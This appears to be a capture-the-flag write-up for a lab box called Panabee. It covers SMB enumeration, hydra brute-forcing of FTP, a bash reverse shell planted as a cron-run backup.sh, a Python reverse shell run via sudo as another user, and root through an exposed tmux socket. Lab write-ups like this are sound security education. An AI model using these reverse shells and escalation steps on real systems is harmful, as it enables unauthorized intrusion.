What kinds of bee is Panabee? Bzzzzzzz….
Interesting box and let's do this! (Please add panabee.my in /etc/hosts)
Enumeration
Let’s do nmap first and see what do we get.
21/tcp open ftp
22/tcp open ssh
25/tcp open smtp
80/tcp open http
139/tcp open Samba smbd 4.6.2
445/tcp open Samba smbd 4.6.2Port 80 (Http)
There is nothing inside here but if you looking for a loan maybe there is something inside here :P
Port 445 & 139 (Samba)
But this one is very interesting. So let's take a look inside what do we get.
smbclient -L <ip>
Okay, nice! We can get inside the note share
smbclient \\\\<ip>\note
So we found a possible user goper and another user tell him to “backup” file in his home directory.
Port 21 (Ftp)
By using hydra we are able to get the password for goper.
Inside the directory, we know that it inside goper home directory. So we know what we should do!
First User (goper)
From the note.txt we should put our reverse shell with a backup name inside the goper directory and it will run (wait around 1 minute).
#Create backup.sh (chmod 777 incase)#!/bin/sh
bash -i >& /dev/tcp/<ip>/<port> 0>&1
We got our first user!
Second User (goper)
As soon as we get the first user. Let's check any sudo permission for this user.
Since we are able to run python3 with jenny permission we able to get jenny user by replacing status.py with our python reverse shell!
#Create status.py #!/usr/bin/pythonimport socket
import subprocess
import oss=socket.socket(socket.AF_INET,socket.SOCK_STREAM)
s.connect(("<ip>",<port>))
os.dup2(s.fileno(),0)
os.dup2(s.fileno(),1)
os.dup2(s.fileno(),2)
p=subprocess.call(["/bin/sh","-i"])
After that just run with sudo jenny and we get the next user!
sudo -u jenny /usr/bin/python3 /home/goper/status.py
Root
Okay now, let's run our linpeas and see if we be able to get something interesting.
Okay, that looks promising. By searching for more information we found that we can attach using a non-default tmux socket. We can do it like this .
tmux -S /opt/.tmux-0/sockets/default attach
Yess! We learn a lot from this box. Congratulations @ch4rm for your first box and I can’t wait for your next box :P Please support this guy!! You can check his website (references).
If there is any suggestion please tell me or if there is something that I can improve also please do tell me. Hope this writeup help anyone and let’s learn together :)
